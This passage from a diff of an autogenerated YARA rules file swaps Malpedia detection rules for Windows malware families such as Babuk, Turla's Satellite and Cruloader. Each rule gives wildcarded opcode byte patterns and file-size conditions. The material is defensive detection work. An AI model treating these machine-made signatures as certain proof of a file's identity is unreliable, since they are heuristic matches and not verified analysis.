+		$sequence_7 = { 8b4710 3bc8 770d 83c8ff 8bf7 e8???????? }
+		$sequence_8 = { 8d4fe2 83e81e 898d54ffffff 898548ffffff bb08000000 0fb707 83f830 }
+		$sequence_9 = { 8b0d???????? 8bd6 2bd0 52 51 50 53 }
 
 	condition:
-		7 of them and filesize < 860160
+		7 of them and filesize < 356352
 }
-rule MALPEDIA_Win_Webc2_Table_Auto : FILE
+rule MALPEDIA_Win_Satellite_Turla_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f2e05018-a2cd-5f74-9326-c8e1d8ecd04d"
+		id = "021a1167-58db-5ce8-8597-0f62f23fcc56"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_table_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.satellite_turla_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "7af577baa9db86d99239cfd53a2d34bbabd6fc2e47d46dae6b2b1756d43598d7"
+		logic_hash = "e5dfd974166d3696682fe85d3bf761357a2cf777cf6c86d583494170169c67ee"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80126,32 +80467,38 @@ rule MALPEDIA_Win_Webc2_Table_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 85c0 59 7534 8d85e4feffff }
-		$sequence_1 = { 53 50 e8???????? 6a07 8d8558ffffff }
-		$sequence_2 = { 56 8d8558ffffff 53 50 e8???????? 6a0a 8d8558ffffff }
-		$sequence_3 = { 57 53 894dec ffd6 59 3bc3 }
-		$sequence_4 = { 6880000000 8d8558ffffff 53 50 e8???????? }
-		$sequence_5 = { 83c418 ffd6 8d45e4 50 8d45d4 }
-		$sequence_6 = { 8d45e8 c745e864000000 50 8d851cfeffff 50 ff15???????? 8d851cfeffff }
-		$sequence_7 = { ab ab 66ab aa baff000000 33c0 8bca }
-		$sequence_8 = { 3bc3 59 0f84fa020000 81fec8000000 0f8dee020000 8d46f5 50 }
-		$sequence_9 = { 8b55f0 8bcf 2bd7 8975f8 }
+		$sequence_0 = { 0105???????? 81c3b0020000 2945e0 75ae 837dd400 }
+		$sequence_1 = { 0105???????? 83c410 29442418 75a9 }
+		$sequence_2 = { 0105???????? 83c410 29442420 75aa }
+		$sequence_3 = { 0108 833a00 7c23 8b442428 }
+		$sequence_4 = { 0108 833e00 7fc7 db46fc }
+		$sequence_5 = { 0108 833e00 7c1f 8b542410 }
+		$sequence_6 = { 0108 833e00 7cc7 7e39 }
+		$sequence_7 = { 51 8d9514fbffff 52 a1???????? 50 ff15???????? 3bc3 }
+		$sequence_8 = { c6459d1f c6459e19 c6459f02 c645a009 c645a11e c645a21f c645a30e }
+		$sequence_9 = { 6a0c 50 c645d036 c645d114 }
+		$sequence_10 = { ff15???????? 85c0 0f8400010000 895dfc }
+		$sequence_11 = { 8d85f0feffff 6a5c 50 e8???????? 59 885801 }
+		$sequence_12 = { 57 ff15???????? ff75f8 e8???????? 59 33c0 }
+		$sequence_13 = { 57 ffd6 a3???????? 6a28 8d45dc }
+		$sequence_14 = { ffd7 8d85f0feffff 50 56 }
+		$sequence_15 = { c645b62b c645b72b e8???????? 83c40c 8d45a8 885db7 50 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 1040384
 }
-rule MALPEDIA_Win_Atmspitter_Auto : FILE
+rule MALPEDIA_Win_Cruloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a7fa682f-eefe-55e1-939b-4455645ebe46"
+		id = "af447408-0b7c-5bac-a78b-97c116da2002"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atmspitter_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cruloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cruloader_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "0ed0ab3302f4e8054faec9b20c1025a14f4da75cd75a5c59684b771cac871b40"
+		logic_hash = "59193418b12a936adb7da239534987c20e49170078a9b714faec730fae8ac983"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80165,34 +80512,34 @@ rule MALPEDIA_Win_Atmspitter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 40 5f 5e c3 8324f5f0cb400000 }
-		$sequence_1 = { 8bc1 c1f805 8bf1 83e61f 8d3c8560da4000 8b07 c1e606 }
-		$sequence_2 = { 8d4c2420 8d8424c8000000 51 89442438 c744243400100000 ff15???????? }
-		$sequence_3 = { 897b04 c7430801000000 e8???????? 6a06 89430c 8d4310 8d8984c84000 }
-		$sequence_4 = { 5d c3 8b5c2420 33c0 89442450 89442454 89442458 }
-		$sequence_5 = { 8bc8 83e01f c1f905 c1e006 03048d60da4000 eb02 8bc2 }
-		$sequence_6 = { 0f854a020000 66837c245207 0f853e020000 8d942480000000 52 ff15???????? 3d09030000 }
-		$sequence_7 = { a3???????? a1???????? c705????????4b3a4000 8935???????? }
-		$sequence_8 = { 7402 ffd0 8345e404 ebe6 c745e060914000 817de064914000 7311 }
-		$sequence_9 = { e8???????? 83c404 8d442420 50 895c2424 c744242857000000 ff15???????? }
+		$sequence_0 = { 75e6 ff7588 ff15???????? 57 ff15???????? 8b4dfc 8bc3 }
+		$sequence_1 = { 894de0 c745e404324100 e9???????? c745e003000000 c745e410324100 }
+		$sequence_2 = { ffd0 8d4598 50 e8???????? 83c404 a3???????? 3b4594 }
+		$sequence_3 = { 56 8b35???????? 85f6 7420 6bc618 57 8db8f05b4100 }
+		$sequence_4 = { d9c9 d9f1 833d????????00 0f851c0e0000 8d0db02f4100 ba1b000000 }
+		$sequence_5 = { ffb504fdffff ffb5e4fcffff ffd7 8945e8 85c0 7536 ff15???????? }
+		$sequence_6 = { 56 57 8d3c856c5c4100 8b07 83ceff 3bc6 }
+		$sequence_7 = { c78518fdffff02000100 bac1b99e64 33c9 e8???????? }
+		$sequence_8 = { ba4c009781 33c9 8bf0 e8???????? babf676bbc 8985bcfdffff 33c9 }
+		$sequence_9 = { 8dbd9cfdffff 2bd6 83c7fe 0f1f4000 668b4702 83c702 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Maktub_Auto : FILE
+rule MALPEDIA_Win_Halfrig_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "10d37b97-d01f-5921-a99f-ff7dd2fcd55b"
+		id = "62b21a07-3d27-5219-adbb-784980e8887e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.maktub_auto.yar#L1-L207"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.halfrig"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.halfrig_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "3c5d956147e4a1bdb902ea8258e01af6a03648debc316e3eed6aa86b46300c73"
+		logic_hash = "40d5c53e96f42e606a7012f83f1c1231408111cee8ecb6b2b8598f974593fa4a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -80204,44 +80551,32 @@ rule MALPEDIA_Win_Maktub_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 f7d8 1bc0 f7d8 8be5 }
-		$sequence_1 = { ff7508 ffd0 85c0 0f846bffffff }
-		$sequence_2 = { ff15???????? c74604???????? c70601000000 eb02 33f6 8b0d???????? }
-		$sequence_3 = { c7430800000000 c7430c00000000 85f6 7428 a1???????? 8b3e 85c0 }
-		$sequence_4 = { ff15???????? c74604???????? c70602000000 eb02 }
-		$sequence_5 = { ff15???????? e9???????? 6a00 8d45f8 c745f800000000 }
-		$sequence_6 = { ff15???????? e9???????? 51 8bdc }
-		$sequence_7 = { c7430800000000 c7430c00000000 c7430400000000 c70300000000 }
-		$sequence_8 = { ff30 e8???????? 8bc7 5f 5e 5b }
-		$sequence_9 = { 8d4e48 e8???????? 6a05 8bce e8???????? 5f }
-		$sequence_10 = { c7461407000000 33c0 668906 5e c20800 b8???????? e8???????? }
-		$sequence_11 = { 8d4e48 e8???????? 8d4e34 e8???????? 8d4e08 }
-		$sequence_12 = { 8d4e50 e8???????? 8bc6 5e }
-		$sequence_13 = { 8d4e50 e8???????? 8d4e40 e8???????? 8d4e30 e8???????? 8d4e1c }
-		$sequence_14 = { c7463464204d00 c7463806000000 c6463c00 5f }
-		$sequence_15 = { c7463464204d00 57 ff7634 e8???????? }
-		$sequence_16 = { 8d4e68 e8???????? 83a6b400000000 8d8eb8000000 }
-		$sequence_17 = { c7461c00000000 85db 741a 68b4000000 }
-		$sequence_18 = { 8d4e48 e8???????? 814e0400000080 8bc6 }
-		$sequence_19 = { c7463464204d00 6a00 57 8bce }
-		$sequence_20 = { c746140f000000 c60600 5e c20800 8b542404 }
-		$sequence_21 = { 8d4e50 e8???????? 8d4df0 e8???????? }
+		$sequence_0 = { e8???????? 403835???????? 4c8d0d37670400 7439 488bd7 }
+		$sequence_1 = { 488d0d03d10600 e8???????? 833d????????ff 0f858a000000 488d542420 4c8bc6 }
+		$sequence_2 = { 488d0d9c6a0700 e8???????? 40383d???????? 7435 488bd3 4c8bc7 43301438 }
+		$sequence_3 = { 49ffc0 4833d0 4983f807 72db 40883d???????? 418b06 4c894e20 }
+		$sequence_4 = { 8802 488d542420 e8???????? 488d0d5cc00700 e8???????? 40383d???????? }
+		$sequence_5 = { e8???????? 488d0d20da0500 e8???????? 40383d???????? 7435 488bd3 }
+		$sequence_6 = { 48c1e008 488bd1 49ffc0 4833d0 4983f80c 72db 40883d???????? }
+		$sequence_7 = { 0f1149f0 4883ea01 75ad 0fb600 4c8d3d43ee0600 }
+		$sequence_8 = { 8801 418b06 3905???????? 0f8ea3000000 488d0da7b30500 }
+		$sequence_9 = { 40883d???????? 4c893d???????? 488d8d30030000 488d059c5a0200 488bd6 660f1f840000000000 488d8980000000 }
 
 	condition:
-		7 of them and filesize < 3063808
+		7 of them and filesize < 1369088
 }
-rule MALPEDIA_Win_Mokes_Auto : FILE
+rule MALPEDIA_Win_Gooseegg_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c2ac2973-931f-5609-90a2-11e20fcc17b8"
+		id = "2b01e34b-c4f4-52eb-8cca-5f132c510659"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mokes_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gooseegg"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gooseegg_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "4e4c9d74cc0d3144676404e81ee560de6bc14d4b048ed928b0226c3699c7f157"
+		logic_hash = "40532f14598b07ba3f10571e0b95a9ef51b8ec16ffc21df237328572ddb56a5f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80255,32 +80590,32 @@ rule MALPEDIA_Win_Mokes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7204 8b5004 51 8bce e8???????? c644244c04 83c40c }
-		$sequence_1 = { ff37 8b4d58 e8???????? ff33 8b4d5c e8???????? 8b4d24 }
-		$sequence_2 = { f30fe6c0 f20f59cb f20f584850 f20f5cc8 f20f104660 f20f59c3 f20f584650 }
-		$sequence_3 = { f00fc101 ff742414 8d44242c 8bce 50 e8???????? 8d4c2428 }
-		$sequence_4 = { ff15???????? 85c0 7435 8d942494000000 8d4c2454 e8???????? c68424a802000004 }
-		$sequence_5 = { f6c444 7a10 f20f1025???????? f20f11642408 eb48 f20f5905???????? f20f11442408 }
-		$sequence_6 = { f6c202 743b 8b442440 83e2fd 89542428 8b08 85c9 }
-		$sequence_7 = { ff5014 5f 5e 8be5 5d c3 ff500c }
-		$sequence_8 = { ff7610 8d8f9c000000 e8???????? 85c0 7413 8bc8 c1e104 }
-		$sequence_9 = { ff5274 85c0 741b 807c241800 b820000000 b910000000 0f45c1 }
+		$sequence_0 = { e9???????? 4d8bb4f6b8dd0000 33d2 498bce }
+		$sequence_1 = { 33d2 498bce ff15???????? 488bd8 eb02 33db 4c8d357194ffff }
+		$sequence_2 = { 41b806000000 488d155de50000 483950f0 740c 488b10 4885d2 7404 }
+		$sequence_3 = { 660feb15???????? 660feb0d???????? 4c8d0d848c0000 f20f5cca }
+		$sequence_4 = { c4c173590cc1 4c8d0d75790000 c5f359c1 c5fb101d???????? c5fb102d???????? c4e2f1a91d???????? c4e2f1a92d???????? }
+		$sequence_5 = { e8???????? 837b1000 75dd 488d05fbe20000 483bd8 74d1 488bcb }
+		$sequence_6 = { 488b8b20010000 e8???????? 488db328010000 bd06000000 488d7b38 488d05b2e60000 }
+		$sequence_7 = { ff15???????? 85c0 741f 488b4c2438 488d1536a70000 ff15???????? }
+		$sequence_8 = { 7350 488bca 4c8d0591e10000 83e13f 488bc2 48c1f806 488d0cc9 }
+		$sequence_9 = { 83c8ff f00fc101 83f801 751c 488b4530 488b8888000000 488d05b6000100 }
 
 	condition:
-		7 of them and filesize < 18505728
+		7 of them and filesize < 217088
 }
-rule MALPEDIA_Win_Babuk_Auto : FILE
+rule MALPEDIA_Win_Manitsme_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8c7b928c-487d-526b-ac59-7d8bfd4e45d6"
+		id = "db884f68-52e3-535c-a75f-a98978605003"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.babuk_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.manitsme_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "354e556bcaba9e4e8ba4670f917c2bf0c9f534ada32a0a701e4d296506ec2560"
+		logic_hash = "272de9774cf5a8eb5198458ddf07f5bca3359e27fa527484a54e8b750a92c4ea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80294,38 +80629,32 @@ rule MALPEDIA_Win_Babuk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 6800000100 e8???????? 83c404 }
-		$sequence_1 = { 50 ff15???????? 83f803 7502 }
-		$sequence_2 = { e8???????? 83c408 8b4d18 8b5508 }
-		$sequence_3 = { 8b0cca 51 e8???????? 83c408 8945f4 8955f8 }
-		$sequence_4 = { 83c002 8945fc 837dfc0a 0f83dc000000 8b4dfc }
-		$sequence_5 = { 89441104 ba08000000 6bc20a 8b4d08 c7040100000000 }
-		$sequence_6 = { 8b4d08 8b540104 52 8b0401 50 }
-		$sequence_7 = { c7040100000000 c744010400000000 ba08000000 6bc200 8b4d08 }
-		$sequence_8 = { 6a0a 6a06 6a02 8d45bc 50 }
-		$sequence_9 = { 68???????? 8b45ec 50 ff15???????? 8945f4 837df400 }
-		$sequence_10 = { 8801 eba7 e9???????? 8b4dfc 33cd e8???????? }
-		$sequence_11 = { 50 8d4dac 51 8b55ac 52 8b45a4 50 }
-		$sequence_12 = { 0f84c6000000 6800800000 8b8de8fdffff 51 ff15???????? 8985e0fdffff 83bdecfdffff00 }
-		$sequence_13 = { 8b5508 8b44ca04 50 8b0cca }
-		$sequence_14 = { 8b5508 c7040a00000000 c7440a0400000000 c745fc00000000 eb09 }
-		$sequence_15 = { 6bf100 8b45ec 8b55f0 b11a e8???????? }
+		$sequence_0 = { 85c0 7586 50 ff15???????? }
+		$sequence_1 = { 89742424 89742420 89742434 89742430 8974242c 89742428 6689742448 }
+		$sequence_2 = { 8b94243c010000 83c40c 89542418 8d842434010000 8d5001 }
+		$sequence_3 = { 51 c744243810000000 896c2440 897c2444 897c2448 }
+		$sequence_4 = { 6a00 51 e8???????? b941000000 }
+		$sequence_5 = { 8d442418 50 68fc030000 8d4c2424 }
+		$sequence_6 = { 68ffff0000 52 ff15???????? 8b3d???????? 6a02 68???????? be0b000000 }
+		$sequence_7 = { 6bf628 03348540580110 8b45e4 8b00 8906 }
+		$sequence_8 = { 5d c3 56 57 33ff 8db7403e0110 ff36 }
+		$sequence_9 = { 896c2440 897c2444 897c2448 897c244c 895c2450 ffd6 }
 
 	condition:
-		7 of them and filesize < 183296
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Leash_Auto : FILE
+rule MALPEDIA_Win_Unidentified_045_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0278e751-33b7-524f-8591-2e0be840b450"
+		id = "76acbb90-4df7-541d-89b1-1533f977dd70"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.leash_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_045_auto.yar#L1-L101"
 		license_url = "N/A"
-		logic_hash = "ed40f6249299f75f35aea5ea7ac83b742dd2beb0bf7f39fe8ae59cad9cdb437c"
+		logic_hash = "85ab00021027191936abb42742c680d628a952bd176522618ad1f59b85811c84"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80339,32 +80668,30 @@ rule MALPEDIA_Win_Leash_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8c24fc150000 3b11 7514 8b442414 }
-		$sequence_1 = { 8d8e19080000 50 51 c706???????? 899e04080000 }
-		$sequence_2 = { c645fc0a e9???????? 8d4db8 e8???????? 3bc3 8945dc 0f8601020000 }
-		$sequence_3 = { 6a20 68???????? e8???????? 8b15???????? }
-		$sequence_4 = { 83c10e 894d18 eb1f 8b4514 83f810 7507 b80a000000 }
-		$sequence_5 = { e8???????? 8b4c2410 51 8b8b08080000 e8???????? 8d4c2410 c684240452000001 }
-		$sequence_6 = { 85c0 0f85fb050000 668b15???????? b9ff000000 8dbc24fe350000 66899424fc350000 f3ab }
-		$sequence_7 = { 8bf0 8bce e8???????? 8b542410 8bce 52 }
-		$sequence_8 = { 8bca 8d959cfdffff 83e103 f3a4 bf???????? 83c9ff f2ae }
-		$sequence_9 = { aa b9ff000000 33c0 8dbd5df5ffff 889d5cf5ffff f3ab }
+		$sequence_0 = { 03480c 894f0c 395808 7517 ff7638 }
+		$sequence_1 = { 53 56 57 be04010000 56 33db 8d85f8fdffff }
+		$sequence_2 = { 5a 32040a 4a 83fa01 }
+		$sequence_3 = { 8d85fcfeffff 50 e8???????? 83f801 74e1 68???????? ff15???????? }
+		$sequence_4 = { 8d75ec e8???????? 85c0 0f8492000000 }
+		$sequence_5 = { 53 ff36 68???????? 53 53 ffd7 }
+		$sequence_6 = { 6a50 ff15???????? 8b3d???????? 8d7520 385d20 }
+		$sequence_7 = { c70083c404e9 8b45fc c740046f92feff 8b45d8 8b400c }
 
 	condition:
-		7 of them and filesize < 761856
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Mimic_Auto : FILE
+rule MALPEDIA_Win_Mistcloak_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7917b34-b106-57a3-b31d-217974d73754"
+		id = "bcb29aaa-c37e-5c55-be1e-5d06aa41cabd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mimic_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mistcloak_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "ea5e4099bfde229f604346a64d8a2d013028ba263c49de05a138be9fade4fcfb"
+		logic_hash = "6962ced189f702e03fc18d236cee46a2a0844476537e8c819ea6f1c43f9c0922"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80378,32 +80705,32 @@ rule MALPEDIA_Win_Mimic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83fa08 7231 8b8db4f5ffff 8d145502000000 8bc1 81fa00100000 7210 }
-		$sequence_1 = { c60100 e8???????? 8a955bfeffff 8d8d30feffff e8???????? 83c418 89854cfeffff }
-		$sequence_2 = { 8d442424 50 6a28 ff15???????? 50 ff15???????? 85c0 }
-		$sequence_3 = { e8???????? 8d4dcc 8b30 8d8548feffff 50 e8???????? 57 }
-		$sequence_4 = { 68???????? 57 894590 ff15???????? 68???????? 57 89458c }
-		$sequence_5 = { 0f872a040000 52 51 e8???????? 83c408 57 }
-		$sequence_6 = { e8???????? 8945e4 c745fc00000000 c7461000000000 c746140f000000 c60600 c745ec08000000 }
-		$sequence_7 = { 8d4dd4 e9???????? 8d4dec e9???????? 6a1c 8b857cfdffff 50 }
-		$sequence_8 = { c745d00f000000 c645bc00 e8???????? c645fc04 8d4dbc 6a0e 68???????? }
-		$sequence_9 = { c785e0fefffff3dd6046 50 68060000c8 56 c785e4feffff8ee976e5 c785e8feffff8c74063e ff15???????? }
+		$sequence_0 = { 8b049590500110 f644082801 740b 56 e8???????? 59 8bf0 }
+		$sequence_1 = { 660f282d???????? 660f59f5 660f28aa70100110 660f54e5 660f58fe 660f58fc }
+		$sequence_2 = { 8b0c8590500110 8b45f8 807c012800 7d46 }
+		$sequence_3 = { 0f85b1000000 8b4508 dd00 ebc2 c745e418120110 eb19 }
+		$sequence_4 = { 6bc618 57 8db8104e0110 57 }
+		$sequence_5 = { 7429 83e805 7415 83e801 0f8595010000 c745e408120110 }
+		$sequence_6 = { c745e408120110 e9???????? c745e404120110 e9???????? 894de0 c745e404120110 e9???????? }
+		$sequence_7 = { 85f6 7420 6bc618 57 8db8104e0110 57 }
+		$sequence_8 = { 8bc1 3914c5781a0110 7408 40 }
+		$sequence_9 = { 8b45b4 8b0c8590500110 8a043b 03ce 8b75dc 03cb 43 }
 
 	condition:
-		7 of them and filesize < 4204544
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Grok_Auto : FILE
+rule MALPEDIA_Win_Portstarter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ccf14bb2-6a3c-5675-9d8f-13b9833157ee"
+		id = "87b6322a-7ef6-5bd0-bab4-2d7f3526e302"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grok_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.portstarter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.portstarter_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "2243923e42742fbe3a7e4306a1c12f85ff68d294ee642e4a1bb4afaaacaacbf5"
+		logic_hash = "370c6c0b9e8b4d5e29811c239d93b7467412e95f00ce8f657934e0617f7c9264"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80417,32 +80744,32 @@ rule MALPEDIA_Win_Grok_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4dfc 8b55fc 03513c 8955ec 8b45ec 8b4850 }
-		$sequence_1 = { 8b5110 8955d8 eb09 8b45fc 8b4808 }
-		$sequence_2 = { bf44646b20 57 6a24 50 8b35???????? ffd6 }
-		$sequence_3 = { 895df8 0f84c2000000 8b7508 3bf3 0f84b7000000 8b7d10 3bfb }
-		$sequence_4 = { 3998dc010000 74a2 68???????? 8d45dc }
-		$sequence_5 = { 7313 8b4dfc 8b148d98940100 3b550c 7502 }
-		$sequence_6 = { e8???????? eb1d 83fe08 720c ff7004 }
-		$sequence_7 = { e8???????? 8945ec 58 e8???????? 8945e8 837de800 750b }
-		$sequence_8 = { c685acfeffff63 c685adfeffff6b c685aefeffff50 c685affeffff61 c685b0feffff67 c685b1feffff65 c685b2feffff73 }
-		$sequence_9 = { 53 ff30 ffd6 893d???????? 33c0 5e 5f }
+		$sequence_0 = { b902000000 e8???????? 4889842410010000 48899c2488000000 e8???????? 4889842448010000 48899c24c0000000 }
+		$sequence_1 = { 90 488d05815c2800 90 e8???????? 488d152cd53000 488910 833d????????00 }
+		$sequence_2 = { 90 48b9887721425d7dfd56 48898c248c000000 c7842494000000fdea6423 0fb68c2491000000 884c2467 0fb6942490000000 }
+		$sequence_3 = { c3 0fb69404e8010000 0fb6bc04b8010000 29d7 4088bc04b8010000 48ffc0 6690 }
+		$sequence_4 = { f6c280 0f84b5000000 48895c2448 4889742450 488d05341c1800 e8???????? 4889442478 }
+		$sequence_5 = { 90 eb11 488d7818 488bb42460020000 e8???????? 4889c3 488d05bb372e00 }
+		$sequence_6 = { 66898424e8000000 e8???????? 48898424d0000000 48895c2448 0fb78c24e8000000 0fb7c9 4889c8 }
+		$sequence_7 = { e8???????? 488b942428010000 48899048030000 833d????????00 90 7520 488b942410030000 }
+		$sequence_8 = { e8???????? 488d8424d8000000 488b9c2430020000 0f1f4000 e8???????? 488d8424d8000000 488b9c2418020000 }
+		$sequence_9 = { bb00001000 e8???????? 4c89c0 4889d9 e8???????? 4889da bb00001000 }
 
 	condition:
-		7 of them and filesize < 84992
+		7 of them and filesize < 14144512
 }
-rule MALPEDIA_Win_Sathurbot_Auto : FILE
+rule MALPEDIA_Win_Yayih_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55b56bcd-97b3-557a-80fc-a30a2a5d5f93"
+		id = "6b0b123b-a2d0-5239-b990-6d6c98b897d2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sathurbot_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yayih_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "516fbdaf796971a35966077b409dae2049cf7a15611af7b3fda85f6cf94f88db"
+		logic_hash = "2fc47407627eaa9d0405e17fbf6ef6d14584c29b56705d065c0a11f1cb55f981"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80456,32 +80783,32 @@ rule MALPEDIA_Win_Sathurbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8f90f07b5 b94cba8e03 }
-		$sequence_1 = { eb13 8a55fa 8a75fb 08d6 f6c601 be09a730d3 0f45f1 }
-		$sequence_2 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8fb0334f5 b995c6f26e }
-		$sequence_3 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8d60de432 b9dc519a31 }
-		$sequence_4 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b88c88bb32 b93cd77390 }
-		$sequence_5 = { c744240400000000 ff15???????? 83ec18 8945e4 837de400 0f9545eb a1???????? }
